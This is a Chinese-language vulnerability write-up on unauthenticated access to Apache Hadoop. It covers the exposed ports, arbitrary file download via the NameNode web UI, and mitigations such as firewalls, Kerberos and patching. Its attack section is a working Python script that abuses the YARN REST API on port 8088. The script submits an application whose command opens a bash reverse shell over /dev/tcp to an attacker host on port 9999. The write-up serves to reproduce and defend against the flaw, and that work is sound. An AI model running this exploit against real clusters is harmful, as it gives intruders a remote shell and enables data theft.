001-Hadoop未授权访问

# Hadoop未授权访问

### 一、漏洞简介

Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理。这个框架被Adobe,Last fm,EBay,Yahoo等知名公司使用着。它极大地精简化程序员进行分布式计算时所需的操作,用户大概通过如下步骤在hadoop中实现分布式处理:

* 用户创建一个处理键值的map函数
* 产生了一套中间键/值
* reduce函数合并中间值并把他们关联到对应的键

### 二、影响范围

### 三、复现过程

1.扫描探测

1.1 常见端口

![](/static/lingzu/images/15890698430179.png)

1.2 敏感端口

![-w448](/static/lingzu/images/15890698539446.jpg)

通过访问 NameNode WebUI 管理界面的 50070 端口,可以下载任意文件。而且,如果 DataNode 的默认端口 50075 开放,攻击者可以通过 HDSF 提供的 restful API 对 HDFS 存储的数据进行操作。

![](/static/lingzu/images/15890698619321.png)

**2.攻击手法**

利用方法和原理中有一些不同。在没有 hadoop client 的情况下,直接通过 REST API 也可以提交任务执行。

利用过程如下:

* 在本地监听等待反弹 shell 连接
* 调用 New Application API 创建 Application
* 调用 Submit Application API 提交

P牛的攻击脚本

“`python
##!/usr/bin/env python

import requests

target = ‘http://127.0.0.1:8088/’
lhost = ‘192.168.0.1’ ## put your local host ip here, and listen at port 9999

url = target + ‘ws/v1/cluster/apps/new-application’
resp = requests.post(url)
app_id = resp.json()[‘application-id’]
url = target + ‘ws/v1/cluster/apps’
data = {
‘application-id’: app_id,
‘application-name’: ‘get-shell’,
‘am-container-spec’: {
‘commands’: {
‘command’: ‘/bin/bash -i >& /dev/tcp/%s/9999 0>&1’ % lhost,
},
},
‘application-type’: ‘YARN’,
}
requests.post(url, json=data)
“`

![](/static/lingzu/images/15890698909370.png)

**3.防范措施**

网络访问控制

使用 安全组防火墙 或本地操作系统防火墙对访问源 IP 进行控制。如果您的 Hadoop 环境仅对内网服务器提供服务,建议不要将 Hadoop 服务所有端口发布到互联网。

启用认证功能

启用 Kerberos 认证功能。

更新补丁

不定期关注 Hadoop 官方发布的最新版本,并及时更新补丁。

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容